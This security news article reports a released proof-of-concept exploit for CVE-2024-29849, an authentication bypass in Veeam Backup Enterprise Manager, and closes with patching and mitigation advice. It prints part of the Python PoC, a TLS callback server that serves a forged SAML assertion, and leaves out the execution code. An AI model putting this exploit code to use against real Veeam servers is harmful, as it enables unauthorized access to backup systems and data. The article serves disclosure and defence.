A proof-of-concept (PoC) exploit has been released for a critical authentication bypass vulnerability in Veeam Backup Enterprise Manager.
The vulnerability, identified as CVE-2024-29849, has a CVSS score of 9.8, indicating its high severity.
This article delves into the details of the vulnerability, the exploit, and the potential implications for organizations using Veeam’s software.
On May 21, 2024, Veeam published an advisory regarding CVE-2024-29849, a critical authentication bypass vulnerability in Veeam Backup Enterprise Manager.
This flaw allows an unauthenticated attacker to log in to the Veeam Backup Enterprise Manager web interface as any user, effectively bypassing all authentication mechanisms.
The vulnerability resides in the Veeam.Backup.Enterprise.RestAPIService.exe, a REST API server component of the Veeam Backup Enterprise Manager software.
This service listens on TCP port 9398 and serves as an API version of the main web application, which operates on TCP port 9443.
Analyze any MaliciousURL, Files & Emails & Configuration With ANY RUN : Start your Analysis
The PoC exploit, developed by Sina Kheirkhah of the Summoning Team, leverages the vulnerability by manipulating the Veeam.Backup.Enterprise.RestAPIService.CEnterpriseRestSessionManagerControllerStub.LogInAfterAuthentication method.
This method is executed when an authentication request is received, and the exploit targets specific checks and conditions within this method to bypass authentication.
The exploit involves crafting a malicious SAML assertion and sending it to the vulnerable Veeam service.
The SAML assertion is designed to trick the service into validating the token and granting access to the attacker.
The exploit script, written in Python, automates this process and includes a callback server to handle the malicious SAML assertion.
The PoC code for the exploit has been made publicly available, allowing security researchers and potentially malicious actors to understand and replicate the attack.
Below is a snippet of the PoC code:
from http.server import HTTPServer, SimpleHTTPRequestHandler
import ssl
import warnings
import base64
import requests
from urllib.parse import urlparse
from threading import Thread
import os
warnings.filterwarnings("ignore", category=DeprecationWarning)
requests.packages.urllib3.disable_warnings()
class CustomHandler(SimpleHTTPRequestHandler):
def do_POST(self):
xml_response = '''<saml2:Assertion xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">
<saml2:Issuer>https://192.168.253.1/STSService</saml2:Issuer>
<saml2:Status>
<saml2:StatusCode Value="http://docs.oasis-open.org/ws-sx/ws-trust/200512/status/valid"/>
</saml2:Status>
</saml2:Assertion>'''
self.send_response(200)
self.send_header("Content-type", "text/xml")
self.end_headers()
self.wfile.write(xml_response.encode("utf-8"))
print("(+) SAML Auth request received, serving malicious RequestSecurityTokenResponseType")
def start_callback_server(ip, port):
httpd = HTTPServer((ip, port), CustomHandler)
ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ssl_context.load_cert_chain("server.pem", keyfile="key.pem")
httpd.socket = ssl_context.wrap_socket(httpd.socket, server_side=True)
print(f"(*) Callback server listening on https://{ip}:{port}")
httpd.serve_forever()
# Additional code for exploit execution...
The release of this PoC exploit underscores the critical nature of CVE-2024-29849.
Organizations using Veeam Backup Enterprise Manager are at significant risk if they do not apply the necessary patches and mitigations.
An attacker exploiting this vulnerability could gain unauthorized access to sensitive data and systems, leading to potential data breaches and other security incidents.
Veeam has recommended immediate updates to their software’s latest version, including patches to address this vulnerability.
Additionally, organizations should review their security configurations and consider implementing additional layers of security, such as multi-factor authentication (MFA) and network segmentation, to mitigate the risk of exploitation.
The discovery and public release of the PoC exploit for CVE-2024-29849 highlight the ongoing challenges in securing enterprise software.
It reminds organizations to stay vigilant, keep their systems updated, and adopt robust security practices to protect against emerging threats.
Looking for Full Data Breach Protection? Try Cynet's All-in-One Cybersecurity Platform for MSPs:
Try Free Demo
Hackers have reportedly infiltrated and extracted a vast 82 GB of sensitive data from the Indonesian…
IBM has issued a security bulletin warning of two vulnerabilities in its AIX operating system…
The Apache Software Foundation has issued a security alert regarding a critical vulnerability in Apache…
The Chinese National Internet Emergency Center (CNIE) has revealed two significant cases of cyber espionage…
A critical command injection vulnerability in the popular systeminformation npm package has recently been disclosed, exposing millions…
Researchers discovered a malware campaign targeting the npm ecosystem, distributing the Skuld info stealer through…